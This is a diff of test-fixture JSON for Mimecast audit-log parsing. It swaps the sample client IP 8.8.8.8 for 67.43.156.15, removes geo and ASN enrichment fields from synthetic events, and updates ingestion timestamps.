 "category": "authentication_logs",
- "eventInfo": "Failed authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-12, Time: 09:47:55 BST, IP: 8.8.8.8, Application: mimecast-moa, Method: Office 365, Reason: Wrong password"
+ "eventInfo": "Failed authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-12, Time: 09:47:55 BST, IP: 67.43.156.15, Application: mimecast-moa, Method: Office 365, Reason: Wrong password"
 }
 },
 {
@@ -697,31 +517,16 @@ "johdoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "existing-archive-task-changed", - "ingested": "2021-11-25T11:34:08.372341400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w\",\"auditType\":\"Existing Archive Task Changed\",\"user\":\"johdoe@example.com\",\"eventTime\":\"2021-10-12T08:47:54+0000\",\"eventInfo\":\"Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\\\"365\\\") to new migrated connector (\\\"Sync and Recover - 365\\\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"archive_service_logs\"}", + "ingested": "2021-12-09T15:16:03.637552300Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w\",\"auditType\":\"Existing Archive Task Changed\",\"user\":\"johdoe@example.com\",\"eventTime\":\"2021-10-12T08:47:54+0000\",\"eventInfo\":\"Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\\\"365\\\") to new migrated connector (\\\"Sync and Recover - 365\\\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": 
"eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w", "created": "2021-10-12T08:47:54.000Z" }, @@ -736,7 +541,7 @@ "mimecast": { "application": "Administration Console", "category": "archive_service_logs", - "eventInfo": "Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\"365\") to new migrated connector (\"Sync and Recover - 365\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\"365\") to new migrated connector (\"Sync and Recover - 365\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 67.43.156.15, Application: Administration Console" } }, { 
@@ -750,31 +555,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "connectors-management", - "ingested": "2021-11-25T11:34:08.372342400Z", - "original": "{\"id\":\"eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM\",\"auditType\":\"Connectors Management\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:53+0000\",\"eventInfo\":\"Connector creation for Microsoft O365\\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"integrations_and_apis\"}", + "ingested": "2021-12-09T15:16:03.637557100Z", + "original": "{\"id\":\"eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM\",\"auditType\":\"Connectors Management\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:53+0000\",\"eventInfo\":\"Connector creation for Microsoft O365\\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"integrations_and_apis\"}", "id": 
"eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM", "created": "2021-10-12T08:47:53.000Z" }, @@ -789,7 +579,7 @@ "mimecast": { "application": "Administration Console", "category": "integrations_and_apis", - "eventInfo": "Connector creation for Microsoft O365\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Connector creation for Microsoft O365\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 67.43.156.15, Application: Administration Console" } }, { 
@@ -808,31 +598,16 @@ "johdoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "page-data-exports", - "ingested": "2021-11-25T11:34:08.372343300Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U\",\"auditType\":\"Page Data Exports\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T02:27:18+0000\",\"eventInfo\":\"[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :8.8.8.8,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 8.8.8.8, Application: mimecast-matfe\",\"category\":\"account_logs\"}", + "ingested": "2021-12-09T15:16:03.637561700Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U\",\"auditType\":\"Page Data Exports\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T02:27:18+0000\",\"eventInfo\":\"[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :67.43.156.15,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 67.43.156.15, Application: 
mimecast-matfe\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U", "created": "2021-10-12T02:27:18.000Z" }, @@ -847,7 +622,7 @@ "mimecast": { "application": "mimecast-matfe", "category": "account_logs", - "eventInfo": "[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :8.8.8.8,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 8.8.8.8, Application: mimecast-matfe" + "eventInfo": "[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :67.43.156.15,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 67.43.156.15, Application: mimecast-matfe" } }, { 
@@ -861,31 +636,16 @@ "johndoe@example.local" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "custom-report-definition-created", - "ingested": "2021-11-25T11:34:08.372344400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF\",\"auditType\":\"Custom Report Definition Created\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-11T19:53:41+0000\",\"eventInfo\":\"Action Performed - Custom Report Definition Created with name \\\"Terri test\\\" and description \\\"all user - per email report\\\" by johndoe@example.local\u003cjohndoe@example.local\u003e Date: 2021-10-11 Time: 20:53:41 +0100 IP: 8.8.8.8 Application: Administration Console\",\"category\":\"reporting_logs\"}", + "ingested": "2021-12-09T15:16:03.637565500Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF\",\"auditType\":\"Custom Report Definition Created\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-11T19:53:41+0000\",\"eventInfo\":\"Action Performed - Custom Report Definition Created with name \\\"Terri test\\\" and description \\\"all user - per email report\\\" by johndoe@example.local\u003cjohndoe@example.local\u003e Date: 2021-10-11 Time: 20:53:41 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"reporting_logs\"}", "id": 
"eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF", "created": "2021-10-11T20:53:41.000Z" }, @@ -900,7 +660,7 @@ "mimecast": { "application": "Administration Console", "category": "reporting_logs", - "eventInfo": "Action Performed - Custom Report Definition Created with name \"Terri test\" and description \"all user - per email report\" by johndoe@example.local\u003cjohndoe@example.local\u003e Date: 2021-10-11 Time: 20:53:41 +0100 IP: 8.8.8.8 Application: Administration Console" + "eventInfo": "Action Performed - Custom Report Definition Created with name \"Terri test\" and description \"all user - per email report\" by johndoe@example.local\u003cjohndoe@example.local\u003e Date: 2021-10-11 Time: 20:53:41 +0100 IP: 67.43.156.15 Application: Administration Console" } }, { 
@@ -913,31 +673,16 @@ "John Doe" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "folder-log-entry", - "ingested": "2021-11-25T11:34:08.372345400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh\",\"auditType\":\"Folder Log Entry\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T18:23:10+0000\",\"eventInfo\":\"Action Performed - Deleted New Folder by johndoe@example.com\u003cJohn Doe\u003e Date: 2021-10-11 Time: 19:23:10 +0100 IP: 8.8.8.8 Application: Administration Console\",\"category\":\"profile_group_logs\"}", + "ingested": "2021-12-09T15:16:03.637570300Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh\",\"auditType\":\"Folder Log Entry\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T18:23:10+0000\",\"eventInfo\":\"Action Performed - Deleted New Folder by johndoe@example.com\u003cJohn Doe\u003e Date: 2021-10-11 Time: 19:23:10 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"profile_group_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh", "created": "2021-10-11T19:23:10.000Z" }, 
@@ -950,7 +695,7 @@ "mimecast": { "application": "Administration Console", "category": "profile_group_logs", - "eventInfo": "Action Performed - Deleted New Folder by johndoe@example.com\u003cJohn Doe\u003e Date: 2021-10-11 Time: 19:23:10 +0100 IP: 8.8.8.8 Application: Administration Console" + "eventInfo": "Action Performed - Deleted New Folder by johndoe@example.com\u003cJohn Doe\u003e Date: 2021-10-11 Time: 19:23:10 +0100 IP: 67.43.156.15 Application: Administration Console" } }, { @@ -966,7 +711,7 @@ }, "event": { "action": "user-password-changed", - "ingested": "2021-11-25T11:34:08.372346400Z", + "ingested": "2021-12-09T15:16:03.637576500Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSCtF28jc2DDLwd_d1NM7ULnLzdnPzdwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiCAQ6SsmlxSX5ualFyfkpqUCbnE3MHM1NgcrLUouKM_PzlKwMawGTZipR\",\"auditType\":\"User Password Changed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:56:55+0000\",\"eventInfo\":\"Password reset for user: johndoe@example.com User Password Changed, Remote IP is null\",\"category\":\"user_account_and_role_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCtF28jc2DDLwd_d1NM7ULnLzdnPzdwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiCAQ6SsmlxSX5ualFyfkpqUCbnE3MHM1NgcrLUouKM_PzlKwMawGTZipR" }, 
@@ -994,31 +739,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "remediation-incident-adjustment", - "ingested": "2021-11-25T11:34:08.372347400Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:49:30+0000\",\"eventInfo\":\"Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\\\"fileHash\\\":\\\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\\\",\\\"start\\\":\\\"2021-09-12T19:48:59+0000\\\",\\\"end\\\":\\\"2021-10-12T19:48:59+0000\\\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"account_logs\"}", + "ingested": "2021-12-09T15:16:03.637582900Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:49:30+0000\",\"eventInfo\":\"Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\\\"fileHash\\\":\\\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\\\",\\\"start\\\":\\\"2021-09-12T19:48:59+0000\\\",\\\"end\\\":\\\"2021-10-12T19:48:59+0000\\\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 67.43.156.15, Application: 
Administration Console\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w", "type": "type : manual", "created": "2021-10-12T19:49:30.000Z" @@ -1034,7 +764,7 @@ "mimecast": { "application": "Administration Console", "category": "account_logs", - "eventInfo": "Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\"fileHash\":\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\",\"start\":\"2021-09-12T19:48:59+0000\",\"end\":\"2021-10-12T19:48:59+0000\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\"fileHash\":\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\",\"start\":\"2021-09-12T19:48:59+0000\",\"end\":\"2021-10-12T19:48:59+0000\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 67.43.156.15, Application: Administration Console" } }, { 
@@ -1048,31 +778,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-restore", - "ingested": "2021-11-25T11:34:08.372348400Z", - "original": "{\"id\":\"eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:20:01+0000\",\"eventInfo\":\"Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"archive_service_logs\"}", + "ingested": "2021-12-09T15:16:03.637588800Z", + "original": "{\"id\":\"eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:20:01+0000\",\"eventInfo\":\"Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw", "created": "2021-10-12T19:20:01.000Z" }, 
@@ -1087,7 +802,7 @@
 "mimecast": {
 "application": "Administration Console",
 "category": "archive_service_logs",
- "eventInfo": "Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 8.8.8.8, Application: Administration Console"
+ "eventInfo": "Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 67.43.156.15, Application: Administration Console"
 }
 },
 {
@@ -1101,31 +816,16 @@ "johndoejr@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-restore", - "ingested": "2021-11-25T11:34:08.372349300Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoejr@example.com\",\"eventTime\":\"2021-10-12T18:19:33+0000\",\"eventInfo\":\"Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"archive_service_logs\"}", + "ingested": "2021-12-09T15:16:03.637594800Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoejr@example.com\",\"eventTime\":\"2021-10-12T18:19:33+0000\",\"eventInfo\":\"Archive mailbox restore created. 
Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84", "created": "2021-10-12T18:19:33.000Z" }, @@ -1140,7 +840,7 @@ "mimecast": { "application": "Administration Console", "category": "archive_service_logs", - "eventInfo": "Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 8.8.8.8, Application: Administration Console" + "eventInfo": "Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 67.43.156.15, Application: Administration Console" } }, { 
@@ -1154,31 +854,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-export-download", - "ingested": "2021-11-25T11:34:08.372350300Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0\",\"auditType\":\"Archive Mailbox Export Download\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:55:14+0000\",\"eventInfo\":\"Mailbox export downloaded. Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 8.8.8.8, Application: Administration Console\",\"category\":\"archive_service_logs\"}", + "ingested": "2021-12-09T15:16:03.637600700Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0\",\"auditType\":\"Archive Mailbox Export Download\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:55:14+0000\",\"eventInfo\":\"Mailbox export downloaded. 
